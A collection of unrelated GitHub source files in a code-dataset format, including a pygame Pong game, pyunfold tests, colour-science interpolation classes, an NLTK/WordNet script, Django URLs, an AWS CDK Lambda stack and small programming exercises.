(25,25))\n scoreTwo = font.render(\"Player One: \" + str(playerOne), True, WHITE)\n window.blit(scoreTwo, (825,25))\n playerSmashOne = font.render(\"Smash Power: \" + str(leftSmashElementRemaining), True, WHITE)\n window.blit(playerSmashOne, (25, 65))\n playerSmashTwo = font.render(\"Smash Power: \" + str(rightSmashElementRemaining), True, WHITE)\n window.blit(playerSmashOne, (825, 65))\n playerFlashOne = font.render(\"Flash Power: \" + str(leftFlashElementRemaining), True, WHITE)\n window.blit(playerFlashOne, (25, 105))\n playerFlashTwo = font.render(\"Flash Power: \" + str(rightFlashElementRemaining), True, WHITE)\n window.blit(playerFlashTwo, (825, 105))\n\n #Draw pygame objects with pygame.draw...\n #Draw Ball\n pygame.draw.circle(window, WHITE, (ball_x, ball_y), radius)\n #Draw Paddles\n pygame.draw.rect(window, WHITE, pygame.Rect(leftPaddleX, leftPaddleY, paddleWidth, paddleHeight))\n pygame.draw.rect(window, WHITE, pygame.Rect(rightPaddleX, rightPaddleY, paddleWidth, paddleHeight))\n #Draw Clone Ball\n pygame.draw.circle(window, WHITE, (cloneBall_x, cloneBall_y), radius)\n #Smash Element Indicator (little red circle on each paddle)\n if leftSmashElement == 1:\n pygame.draw.circle(window, RED, (leftPaddleX + 10, leftPaddleY + 10), 4)\n if rightSmashElement == 1:\n pygame.draw.circle(window, RED, (rightPaddleX + 10, rightPaddleY + 10), 4) \n #To see ojects in the window we must update the display\n\n #END GAME!!!!!\n winningFont = 
pygame.font.SysFont('callibri', 100)\n if playerOne >= 3:\n window.fill(BLACK)\n endscreen = winningFont.render(\"Player One: WINNER\", True, WHITE)\n window.blit(endscreen, (200, 250))\n if playerTwo >= 3:\n window.fill(BLACK)\n endscreen = winningFont.render(\"Player Two: WINNER\", True, WHITE)\n window.blit(endscreen, (200, 250))\n pygame.display.update()","repo_name":"diegoIsBuilding/pongWithPythonAndPyGame","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":13002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20511110875","text":"\nimport pytest\n\nfrom pyunfold.teststat import get_ts, TEST_STATISTICS\n\n\n@pytest.mark.parametrize('name', TEST_STATISTICS.keys())\ndef test_get_ts(name):\n assert get_ts(name) in TEST_STATISTICS.values()\n\n\ndef test_get_ts_raises():\n name = 'not a valid ts'\n with pytest.raises(ValueError) as excinfo:\n get_ts(name)\n\n expected_msg = ('Invalid test statistic, {}, entered. Must be '\n 'in {}'.format(name, TEST_STATISTICS.keys()))\n assert expected_msg == str(excinfo.value)\n\n\n@pytest.mark.parametrize('ts', TEST_STATISTICS.keys())\ndef test_ts_calc(ts, example_dataset):\n # Regression test for issue #92\n ts_obj = get_ts(ts)\n ts_func = ts_obj(tol=0.01,\n num_causes=len(example_dataset.data),\n TestRange=[0, 1e2],\n verbose=False)\n ts_func.calc(example_dataset.data, example_dataset.data + 1)\n","repo_name":"jrbourbeau/pyunfold","sub_path":"pyunfold/tests/test_teststat.py","file_name":"test_teststat.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"31"} +{"seq_id":"30090784524","text":"try:\n #提示输入一个整数\n num=int(input(\"输入一个整数\"))\n result=8/num\n\n print(result)\nexcept ValueError:\n print(\"输入整数\")\nexcept ZeroDivisionError:\n print(\"除0错误\")\n#捕获未知错误\n#因为不可能预判到所有的错误类型。\nexcept Exception as ex:\n print(\"未知错误%s\" % ex)","repo_name":"wanggl617/python_o","sub_path":"py_16_Exception.py","file_name":"py_16_Exception.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5029082015","text":"import nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import wordnet as wn\nimport codecs\nfrom neo4jrestclient.client import GraphDatabase\n\n# //-----------------------------------------------Global variable-------------------------------------------------------\\\\\ndb = GraphDatabase(\"http://localhost:7474\", username=\"boyan\", password=\"boy123\")\nwn_lemmas = set(wn.all_lemma_names()) # untuk pengecekkan kata apabila tidak ada pada wordnet\n\n# //-----------------------------------------------Function-------------------------------------------------------\\\\\ndef open_file(text) :\n with codecs.open(text, 'r', encoding='utf8') as f:\n source_text = f.read()\n # print(source_text)\n return source_text\n\ndef sentences(source_text) :\n # if source_text == None\n # print(\"File not found\")\n # exit()\n # else\n sentence_list = sent_tokenize(source_text)\n # print(sentence_list)\n return sentence_list\n\ndef candidate_set(source_text) :\n # if source_text == None\n # print(\"File not found\")\n # exit()\n # else\n list_postag = nltk.pos_tag(word_tokenize(source_text))\n #print(list_postag)\n nouns = [token for token, pos in list_postag if pos.startswith('N')]\n return nouns\n #print('Candidate Set : \\n', nouns)\n\n# 
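# --- Added usage sketch (not in the original script) ---
# Assumes the NLTK tokenizer/tagger data used above are installed;
# candidate_set() keeps only the noun tokens of the tagged text:
print(candidate_set("The machine is a device."))  # expected: ['machine', 'device']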
print(sentences(open_file('source.txt')))\n# print(word_tokenize(open_file('source.txt')))\n# print(candidate_set(open_file('source.txt')))\n\n# -------------Penambahan informasi letak kalimat dengan kata yang ada di anggota candidate set----------------------\n# sent_list = sentences(open_file('source.txt'))\n# nouns = [[], []]\n# for idx, sentence in enumerate(sent_list):\n# for word, pos in nltk.pos_tag(nltk.word_tokenize(str(sentence))):\n# if (pos == 'NN' or pos == 'NNP' or pos == 'NNS' or pos == 'NNPS'):\n# nouns[0].append(word)\n# nouns[1].append(idx)\n\n# for idx, val in enumerate(nouns[0]):\n# print('kata', '\"', nouns[0][idx], '\"', 'terdapat pada kalimat : ', sent_list[nouns[1][idx]] )\n# print(nouns[0][1], nouns[1][1], sent_list[1])\n\n# //-----------------------------------------------SENSE_KATA-------------------------------------------------------\\\\\n\n# candidate = candidate_set(open_file('source2.txt'))\n# print(candidate)\n# i = 0\n# list_sense = {}\n# while i < len(nouns):\n# for ss in wn.synsets(nouns[i], pos='n'):\n# list_sense = {\n# \"noun\": nouns[i],\n# \"synset\": ss.name(),\n# \"lemma\": ss.lemma_names(),\n# \"definition\": ss.definition(),\n# \"hypernyms\": ss.hypernyms()\n# }\n# print(list_sense)\n# i += 1\n\n# //------------------- PENGECEKKAN KATA YANG ADA PADA LEMMA SYNSET\n\ndef identifikasiSyn(word, word1): # Output berupa boolean apakah dua kata tersebut terikat synonim atau tidak\n # if word in wn_lemmas:\n # if word1 in wn_lemmas:\n for ss in wn.synsets(word, pos='n'): #pos='n' untuk mengambil synset yang merupakan noun (karena ada dua yaitu noun dan verb)\n lemmas = ss.lemmas()\n for l in lemmas:\n if l.name() == word1:\n return True\n # else:\n # return False\n\ndef identifikasiHip(word, word1): # Output berupa nilai terbesar dari semua nilai hipernim dari dua kata\n value = []\n # if word in wn_lemmas:\n # if word1 in wn_lemmas:\n for s1 in wn.synsets(word, pos='n'):\n # print(s1)\n for s2 in wn.synsets(word1, pos='n'):\n # print(s2)\n similarity = wn.path_similarity(s1, s2)\n value.append(similarity)\n # print('value', s1, 'and', s2, '=', similarity)\n return max(value)\n # else:\n # return 0\n\n# //------------------- CARA AMBIL MERONIM/HOLONIM\n# car = wn.synset('car.n.01')\n# cc = car.part_meronyms()\n# # print(cc)\n# for synset in cc:\n# print(synset.name().split('.')[0])\n\n# //------------------- MENGIDENTIFIKASI SHORTEST PATH DAN INTERSECTION DARI SYNSET DEFINITIOIN\n#person = wn.synset('person.n.01')\n#machine = wn.synset('machine.n.02')\n#tax_dis = person.shortest_path_distance(machine)\n#comm_lemmas = len(set(person.lemma_names()).intersection(set(machine.definition())))\n\n# //--------------------------------------------- MAIN_FUNCTION -----------------------------------------------------\\\\\n\ncandidate = ['Mr.', 'person', 'machine', 'device', 'individual', 'car']\n# print(identifikasiHip('Kenny', 'python'))\n# print(candidate)\n\n# //---------------------- Node dibuat berdasarkan anggota candidate set\n# word = db.labels.create(\"Word\")\n# for noun in candidate:\n# if noun in wn_lemmas:\n # print(noun)\n # word.add(db.nodes.create(word=noun))\n# Node dibuat berdasarkan anggota candidate set ----------------------\\\\\n\n\n# //---------------------- Pengecekkan Relasi antar 2 kata dan add ke graph\n# i = 0\n# j = 0\n# simiprev = 0\n# while i < (len(candidate)):\n# j = i + 1\n# while j < len(candidate):\n# if identifikasiSyn(candidate[i], candidate[j]) == True:\n# for p in word.get(word=candidate[i]):\n# for w2 in 
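# --- Added usage sketch (not in the original; needs the WordNet corpus) ---
# identifikasiSyn checks for a shared synset lemma, identifikasiHip takes the
# best path similarity over all noun-synset pairs of the two words:
print(identifikasiSyn('car', 'auto'))     # True: 'auto' is a lemma of car.n.01
print(identifikasiHip('car', 'machine'))  # a float in (0, 1]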
word.get(word=candidate[j]):\n# p.Syno(w2)\n# print('add syno success')\n# # print(candidate[i], 'to', candidate[j], 'is Synonim adding Succes')\n# elif 0 < identifikasiHip(candidate[i], candidate[j]) <= 1:\n# similarity = identifikasiHip(candidate[i], candidate[j])\n# # if similarity != 0:\n# if simiprev <= similarity:\n# for p in word.get(word=candidate[i]):\n# for w2 in word.get(word=candidate[j]):\n# p.Hypo_Hype(w2)\n# w2.Hypo_Hype(p)\n# print('add hypo_hype success')\n# simiprev = similarity\n# # print(candidate[i], 'to', candidate[j], 'is Hipernim', '[value = ', similarity, '] adding Succes')\n# j += 1\n# i += 1\n# Pengecekkan Relasi antar 2 kata dan add ke graph ----------------------\\\\\n","repo_name":"mocharief/LexicalChainSumm_TA","sub_path":"preprocessing_text.py","file_name":"preprocessing_text.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36873267049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInterpolation\n=============\n\nDefines classes for interpolating variables.\n\n- :class:`LinearInterpolator`: 1-D function linear interpolation.\n- :class:`SpragueInterpolator`: 1-D function fifth-order polynomial\n interpolation using *Sprague (1880)* method.\n- :class:`CubicSplineInterpolator`: 1-D function cubic spline interpolation.\n- :class:`PchipInterpolator`: 1-D function piecewise cube Hermite\n interpolation.\n- :func:`lagrange_coefficients`: Computation of *Lagrange Coefficients*.\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport numpy as np\nimport scipy.interpolate\nfrom six.moves import reduce\n\nfrom colour.utilities import as_numeric, interval\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2013-2016 - Colour Developers'\n__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-science@googlegroups.com'\n__status__ = 'Production'\n\n__all__ = ['LinearInterpolator',\n 'SpragueInterpolator',\n 'CubicSplineInterpolator',\n 'PchipInterpolator',\n 'lagrange_coefficients']\n\n\nclass LinearInterpolator(object):\n \"\"\"\n Linearly interpolates a 1-D function.\n\n Parameters\n ----------\n x : ndarray\n Independent :math:`x` variable values corresponding with :math:`y`\n variable.\n y : ndarray\n Dependent and already known :math:`y` variable values to\n interpolate.\n\n Methods\n -------\n __call__\n\n Notes\n -----\n This class is a wrapper around *numpy.interp* definition.\n\n See Also\n --------\n SpragueInterpolator\n\n Examples\n --------\n Interpolating a single numeric variable:\n\n >>> y = np.array([5.9200,\n ... 9.3700,\n ... 10.8135,\n ... 4.5100,\n ... 69.5900,\n ... 27.8007,\n ... 
86.0500])\n >>> x = np.arange(len(y))\n >>> f = LinearInterpolator(x, y)\n >>> # Doctests ellipsis for Python 2.x compatibility.\n >>> f(0.5) # doctest: +ELLIPSIS\n 7.64...\n\n Interpolating an *array_like* variable:\n\n >>> f([0.25, 0.75])\n array([ 6.7825, 8.5075])\n \"\"\"\n\n def __init__(self, x=None, y=None):\n self.__x = None\n self.x = x\n self.__y = None\n self.y = y\n\n self._validate_dimensions()\n\n @property\n def x(self):\n \"\"\"\n Property for **self.__x** private attribute.\n\n Returns\n -------\n array_like\n self.__x\n \"\"\"\n\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"\n Setter for **self.__x** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n if value is not None:\n value = np.atleast_1d(value).astype(np.float_)\n\n assert value.ndim == 1, (\n '\"x\" independent variable must have exactly one dimension!')\n\n self.__x = value\n\n @property\n def y(self):\n \"\"\"\n Property for **self.__y** private attribute.\n\n Returns\n -------\n array_like\n self.__y\n \"\"\"\n\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"\n Setter for **self.__y** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n if value is not None:\n value = np.atleast_1d(value).astype(np.float_)\n\n assert value.ndim == 1, (\n '\"y\" dependent variable must have exactly one dimension!')\n\n self.__y = value\n\n def __call__(self, x):\n \"\"\"\n Evaluates the interpolating polynomial at given point(s).\n\n\n Parameters\n ----------\n x : numeric or array_like\n Point(s) to evaluate the interpolant at.\n\n Returns\n -------\n float or ndarray\n Interpolated value(s).\n \"\"\"\n\n x = np.atleast_1d(x).astype(np.float_)\n\n xi = as_numeric(self._evaluate(x))\n\n return xi\n\n def _evaluate(self, x):\n \"\"\"\n Performs the interpolating polynomial evaluation at given points.\n\n Parameters\n ----------\n x : ndarray\n Points to evaluate the interpolant at.\n\n Returns\n -------\n ndarray\n Interpolated points values.\n \"\"\"\n\n self._validate_dimensions()\n self._validate_interpolation_range(x)\n\n return np.interp(x, self.__x, self.__y)\n\n def _validate_dimensions(self):\n \"\"\"\n Validates variables dimensions to be the same.\n \"\"\"\n\n if len(self.__x) != len(self.__y):\n raise ValueError(\n ('\"x\" independent and \"y\" dependent variables have different '\n 'dimensions: \"{0}\", \"{1}\"').format(len(self.__x),\n len(self.__y)))\n\n def _validate_interpolation_range(self, x):\n \"\"\"\n Validates given point to be in interpolation range.\n \"\"\"\n\n below_interpolation_range = x < self.__x[0]\n above_interpolation_range = x > self.__x[-1]\n\n if below_interpolation_range.any():\n raise ValueError('\"{0}\" is below interpolation range.'.format(x))\n\n if above_interpolation_range.any():\n raise ValueError('\"{0}\" is above interpolation range.'.format(x))\n\n\nclass SpragueInterpolator(object):\n \"\"\"\n Constructs a fifth-order polynomial that passes through :math:`y` dependent\n variable.\n\n *Sprague (1880)* method is recommended by the *CIE* for interpolating\n functions having a uniformly spaced independent variable.\n\n Parameters\n ----------\n x : array_like\n Independent :math:`x` variable values corresponding with :math:`y`\n variable.\n y : array_like\n Dependent and already known :math:`y` variable values to\n interpolate.\n\n Methods\n -------\n __call__\n\n See Also\n --------\n LinearInterpolator\n\n Notes\n -----\n The minimum number :math:`k` of data 
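# --- Added equivalence check (not from the original module) ---
# LinearInterpolator is documented above as a wrapper around numpy.interp,
# so the two should agree on any in-range point:
import numpy as np
y = np.array([5.92, 9.37, 10.8135, 4.51, 69.59, 27.8007, 86.05])
x = np.arange(len(y))
assert np.isclose(LinearInterpolator(x, y)(0.5), np.interp(0.5, x, y))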
points required along the\n interpolation axis is :math:`k=6`.\n\n References\n ----------\n .. [1] CIE TC 1-38. (2005). 9.2.4 Method of interpolation for uniformly\n spaced independent variable. In CIE 167:2005 Recommended Practice\n for Tabulating Spectral Data for Use in Colour Computations\n (pp. 1–27). ISBN:978-3-901-90641-1\n .. [2] Westland, S., Ripamonti, C., & Cheung, V. (2012). Interpolation\n Methods. In Computational Colour Science Using MATLAB\n (2nd ed., pp. 29–37). ISBN:978-0-470-66569-5\n\n Examples\n --------\n Interpolating a single numeric variable:\n\n >>> y = np.array([5.9200,\n ... 9.3700,\n ... 10.8135,\n ... 4.5100,\n ... 69.5900,\n ... 27.8007,\n ... 86.0500])\n >>> x = np.arange(len(y))\n >>> f = SpragueInterpolator(x, y)\n >>> f(0.5) # doctest: +ELLIPSIS\n 7.2185025...\n\n Interpolating an *array_like* variable:\n\n >>> f([0.25, 0.75]) # doctest: +ELLIPSIS\n array([ 6.7295161..., 7.8140625...])\n \"\"\"\n\n SPRAGUE_C_COEFFICIENTS = np.array(\n [[884, -1960, 3033, -2648, 1080, -180],\n [508, -540, 488, -367, 144, -24],\n [-24, 144, -367, 488, -540, 508],\n [-180, 1080, -2648, 3033, -1960, 884]])\n \"\"\"\n Defines the coefficients used to generate extra points for boundaries\n interpolation.\n\n SPRAGUE_C_COEFFICIENTS : array_like, (4, 6)\n\n References\n ----------\n .. [3] CIE TC 1-38. (2005). Table V. Values of the c-coefficients of\n Equ.s 6 and 7. In CIE 167:2005 Recommended Practice for Tabulating\n Spectral Data for Use in Colour Computations (p. 19).\n ISBN:978-3-901-90641-1\n \"\"\"\n\n def __init__(self, x=None, y=None):\n self._xp = None\n self._yp = None\n\n self.__x = None\n self.x = x\n self.__y = None\n self.y = y\n\n self._validate_dimensions()\n\n @property\n def x(self):\n \"\"\"\n Property for **self.__x** private attribute.\n\n Returns\n -------\n array_like\n self.__x\n \"\"\"\n\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"\n Setter for **self.__x** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n if value is not None:\n value = np.atleast_1d(value).astype(np.float_)\n\n assert value.ndim == 1, (\n '\"x\" independent variable must have exactly one dimension!')\n\n value_interval = interval(value)[0]\n\n xp1 = value[0] - value_interval * 2\n xp2 = value[0] - value_interval\n xp3 = value[-1] + value_interval\n xp4 = value[-1] + value_interval * 2\n\n self._xp = np.concatenate(((xp1, xp2), value, (xp3, xp4)))\n\n self.__x = value\n\n @property\n def y(self):\n \"\"\"\n Property for **self.__y** private attribute.\n\n Returns\n -------\n array_like\n self.__y\n \"\"\"\n\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"\n Setter for **self.__y** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n if value is not None:\n value = np.atleast_1d(value).astype(np.float_)\n\n assert value.ndim == 1, (\n '\"y\" dependent variable must have exactly one dimension!')\n\n assert len(value) >= 6, (\n '\"y\" dependent variable values count must be in domain [6:]!')\n\n yp1 = np.ravel((np.dot(\n self.SPRAGUE_C_COEFFICIENTS[0],\n np.array(value[0:6]).reshape((6, 1)))) / 209)[0]\n yp2 = np.ravel((np.dot(\n self.SPRAGUE_C_COEFFICIENTS[1],\n np.array(value[0:6]).reshape((6, 1)))) / 209)[0]\n yp3 = np.ravel((np.dot(\n self.SPRAGUE_C_COEFFICIENTS[2],\n np.array(value[-6:]).reshape((6, 1)))) / 209)[0]\n yp4 = np.ravel((np.dot(\n self.SPRAGUE_C_COEFFICIENTS[3],\n np.array(value[-6:]).reshape((6, 1)))) / 209)[0]\n\n self._yp = 
np.concatenate(((yp1, yp2), value, (yp3, yp4)))\n\n self.__y = value\n\n def __call__(self, x):\n \"\"\"\n Evaluates the interpolating polynomial at given point(s).\n\n Parameters\n ----------\n x : numeric or array_like\n Point(s) to evaluate the interpolant at.\n\n Returns\n -------\n numeric or ndarray\n Interpolated value(s).\n \"\"\"\n\n return self._evaluate(x)\n\n def _evaluate(self, x):\n \"\"\"\n Performs the interpolating polynomial evaluation at given point.\n\n Parameters\n ----------\n x : numeric\n Point to evaluate the interpolant at.\n\n Returns\n -------\n float\n Interpolated point values.\n \"\"\"\n\n x = np.asarray(x)\n\n self._validate_dimensions()\n self._validate_interpolation_range(x)\n\n i = np.searchsorted(self._xp, x) - 1\n X = (x - self._xp[i]) / (self._xp[i + 1] - self._xp[i])\n\n r = self._yp\n\n a0p = r[i]\n a1p = ((2 * r[i - 2] - 16 * r[i - 1] + 16 * r[i + 1] - 2 *\n r[i + 2]) / 24)\n a2p = ((-r[i - 2] + 16 * r[i - 1] - 30 * r[i] + 16 * r[i + 1] -\n r[i + 2]) / 24)\n a3p = ((-9 * r[i - 2] + 39 * r[i - 1] - 70 * r[i] + 66 *\n r[i + 1] - 33 * r[i + 2] + 7 * r[i + 3]) / 24)\n a4p = ((13 * r[i - 2] - 64 * r[i - 1] + 126 * r[i] - 124 *\n r[i + 1] + 61 * r[i + 2] - 12 * r[i + 3]) / 24)\n a5p = ((-5 * r[i - 2] + 25 * r[i - 1] - 50 * r[i] + 50 *\n r[i + 1] - 25 * r[i + 2] + 5 * r[i + 3]) / 24)\n\n y = (a0p + a1p * X + a2p * X ** 2 + a3p * X ** 3 + a4p * X ** 4 +\n a5p * X ** 5)\n\n return y\n\n def _validate_dimensions(self):\n \"\"\"\n Validates variables dimensions to be the same.\n \"\"\"\n\n if len(self.__x) != len(self.__y):\n raise ValueError(\n ('\"x\" independent and \"y\" dependent variables have different '\n 'dimensions: \"{0}\", \"{1}\"').format(len(self.__x),\n len(self.__y)))\n\n def _validate_interpolation_range(self, x):\n \"\"\"\n Validates given point to be in interpolation range.\n \"\"\"\n\n below_interpolation_range = x < self.__x[0]\n above_interpolation_range = x > self.__x[-1]\n\n if below_interpolation_range.any():\n raise ValueError('\"{0}\" is below interpolation range.'.format(x))\n\n if above_interpolation_range.any():\n raise ValueError('\"{0}\" is above interpolation range.'.format(x))\n\n\nclass CubicSplineInterpolator(scipy.interpolate.interp1d):\n \"\"\"\n Interpolates a 1-D function using cubic spline interpolation.\n\n Notes\n -----\n This class is a wrapper around *scipy.interpolate.interp1d* class.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(CubicSplineInterpolator, self).__init__(\n kind='cubic', *args, **kwargs)\n\n\nclass PchipInterpolator(scipy.interpolate.PchipInterpolator):\n \"\"\"\n Interpolates a 1-D function using Piecewise Cubic Hermite Interpolating\n Polynomial interpolation.\n\n Notes\n -----\n This class is a wrapper around *scipy.interpolate.PchipInterpolator*\n class.\n \"\"\"\n\n def __init__(self, x=None, y=None, *args, **kwargs):\n super(PchipInterpolator, self).__init__(x, y, *args, **kwargs)\n\n self.__y = y\n\n @property\n def y(self):\n \"\"\"\n Property for **self.__y** private attribute.\n\n Returns\n -------\n array_like\n self.__y\n \"\"\"\n\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"\n Setter for **self.__y** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n raise AttributeError('\"{0}\" attribute is read only!'.format('y'))\n\n\ndef lagrange_coefficients(r, n=4):\n \"\"\"\n Computes the *Lagrange Coefficients* at given point :math:`r` for degree\n :math:`n`.\n\n Parameters\n ----------\n r : numeric\n Point to get the 
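# --- Added property check (not from the original module) ---
# Lagrange basis polynomials form a partition of unity, so the coefficients
# returned by lagrange_coefficients() (defined just below) sum to 1:
import numpy as np
assert np.isclose(np.sum(lagrange_coefficients(0.1)), 1.0)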
*Lagrange Coefficients* at.\n n : int, optional\n Degree of the *Lagrange Coefficients* being calculated.\n\n Returns\n -------\n ndarray\n\n References\n ----------\n .. [4] Fairman, H. S. (1985). The calculation of weight factors for\n tristimulus integration. Color Research & Application, 10(4),\n 199–203. doi:10.1002/col.5080100407\n .. [5] Wikipedia. (n.d.). Lagrange polynomial - Definition. Retrieved\n January 20, 2016, from\n https://en.wikipedia.org/wiki/Lagrange_polynomial#Definition\n\n Examples\n --------\n >>> lagrange_coefficients(0.1)\n array([ 0.8265, 0.2755, -0.1305, 0.0285])\n \"\"\"\n\n r_i = np.arange(n)\n L_n = []\n for j in range(len(r_i)):\n basis = [(r - r_i[i]) / (r_i[j] - r_i[i])\n for i in range(len(r_i)) if i != j]\n L_n.append(reduce(lambda x, y: x * y, basis)) # noqa\n\n return np.array(L_n)\n","repo_name":"scoopxyz/colour","sub_path":"colour/algebra/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":15592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"17848747936","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\n\nurlpatterns = patterns('',\n (r'^admin/', include('django.contrib.admin.urls')),\n (r'^i18n/', include('django.conf.urls.i18n')),\n (r'^r/', include('django.conf.urls.shortcut')),\n #\n (r'^concerts/', include('concerts.urls')),\n (r'^documents/', include('documents.urls')),\n (r'^links/', include('links.urls')),\n (r'^programmes/', include('programmes.urls')),\n (r'^singers/', include('singers.urls')),\n #\n (r'^', include('articles.urls')),\n)\n\nif settings.LOCAL_DEV:\n urlpatterns = patterns('',\n (r'^media-lieder/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT,\n 'show_indexes': True, }),\n) + urlpatterns","repo_name":"funollet/lieder-web","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4196072583","text":"def ini():\n n = input()\n return int(n)\n\n\ntestCase = ini()\nwhile testCase > 0:\n testCase-=1\n n,m=(int(i) for i in input().split())\n l = (int(i) for i in input().split())\n print(min(m,sum(l)))","repo_name":"mdskrumi/Online-Judge-Problem-Solutions","sub_path":"CF/NotOne/A. Grade Allocation.py","file_name":"A. 
Grade Allocation.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"41928987719","text":"from copy import deepcopy\nfrom scipy.spatial.distance import euclidean as dist\nfrom random import random\nimport math as m\n\nclass Circle:\n def __init__(self, x, y, r):\n self.x = x\n self.y = y\n self.r = r\n self.index = None\n \n def is_intersect(self, other):\n self_xy = [self.x, self.y]\n other_xy = [other.x, other.y]\n return dist(self_xy, other_xy) <= self.r + other.r\n \n def try_to_move(self, dx, dy, min_x, max_x, min_y, max_y):\n res = deepcopy(self)\n new_x = res.x + (2 * random() - 1) * dx\n new_y = res.y + (2 * random() - 1) * dy\n\n if new_x >= max_x - self.r:\n new_x = max_x - self.r\n\n if new_x <= min_x + self.r:\n new_x = min_x + self.r\n\n if new_y >= max_y - self.r:\n new_y = max_y - self.r\n\n if new_y <= min_y + self.r:\n new_y = min_y + self.r\n \n res.x = new_x\n res.y = new_y\n \n return res\n \n def get_area(self):\n return m.pi * self.r * self.r","repo_name":"mrmrmr7/diploma","sub_path":"percolation/dimension2/circle/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15608577635","text":"def solution(n):\n answer = 0\n ternary = ''\n\n while n:\n ternary += str(n % 3)\n n //= 3\n\n for i in reversed(range(len(ternary))):\n answer += int(ternary[i]) * (3 ** (len(ternary) - i - 1))\n\n return answer","repo_name":"JooaeSon/Daily_CodingTest","sub_path":"Programmers/Lv.1/3진법 뒤집기.py","file_name":"3진법 뒤집기.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2054810887","text":"from aws_cdk import (\n aws_iam as iam,\n aws_lambda,\n core\n)\n\n\nclass LambdaStack(core.NestedStack):\n def __init__(self, scope, id, *, name=None, directory=None, bucket=None, key=None) -> None:\n super().__init__(scope, id)\n # ==================================================\n # ================= IAM ROLE =======================\n # ==================================================\n lambda_role = iam.Role(\n scope=self,\n id='lambda_role',\n assumed_by=iam.ServicePrincipal(service='lambda.amazonaws.com'),\n managed_policies=[iam.ManagedPolicy.from_aws_managed_policy_name('AWSLambdaExecute')]\n )\n\n # ==================================================\n # =================== ECR IMAGE ====================\n # ==================================================\n ecr_image = aws_lambda.DockerImageCode.from_image_asset(\n repository_name=name,\n directory=directory\n )\n\n # ==================================================\n # ================ LAMBDA FUNCTION =================\n # ==================================================\n self.lambda_function = aws_lambda.DockerImageFunction(\n scope=self,\n id='lambda',\n function_name=name,\n code=ecr_image,\n memory_size=1024,\n role=lambda_role,\n environment={\n 'BUCKET': bucket,\n 'KEY': key\n },\n timeout=core.Duration.seconds(60)\n )\n","repo_name":"sofianhamiti/aws-lambda-multi-model-express-workflow","sub_path":"stacks/lambda_stack.py","file_name":"lambda_stack.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"17159830699","text":"# Python Packages\r\nimport os\r\nimport unittest\r\nimport 
random\r\n\r\n# Own Packages\r\nfrom dataloaders.synthia.dataset_synthia import SynthiaRandCityscapesDataset\r\nfrom dataloaders.cityscapes.dataset_cityscapes_semantic import CityscapesSemanticDataset\r\nfrom cfg.config_training import get_cfg_dataset_defaults\r\n\r\n# Dependencies\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nfrom torch.utils.data import DataLoader\r\nimport numpy as np\r\n\r\n\r\nclass TestSynthiaDataset(unittest.TestCase):\r\n \"\"\"\r\n This is not really a test class, but it is simply used to visualize and plot differences in the data\r\n across cityscapes and synthia, to verify that they are loaded similarly\r\n \"\"\"\r\n\r\n def setUp(self):\r\n np.random.seed(0)\r\n torch.manual_seed(0)\r\n random.seed(0)\r\n path_16 = os.path.join('dataloaders', 'tests', 'data', 'synthia_16.yaml')\r\n cfg_16 = get_cfg_dataset_defaults()\r\n cfg_16.merge_from_file(path_16)\r\n cfg_16.freeze()\r\n ds_16 = SynthiaRandCityscapesDataset(mode='train', split=None, cfg=cfg_16)\r\n self.s_loader = DataLoader(ds_16, batch_size=1, shuffle=False, num_workers=0, pin_memory=True, drop_last=True)\r\n path_16 = os.path.join('dataloaders', 'tests', 'data', 'cityscapes_semantic_16.yaml')\r\n cfg_16 = get_cfg_dataset_defaults()\r\n cfg_16.merge_from_file(path_16)\r\n cfg_16.freeze()\r\n ds_16 = CityscapesSemanticDataset('train', None, cfg=cfg_16)\r\n self.c_loader = DataLoader(ds_16, batch_size=1, shuffle=False, num_workers=0, pin_memory=True, drop_last=True)\r\n\r\n def testPlotImages(self):\r\n # 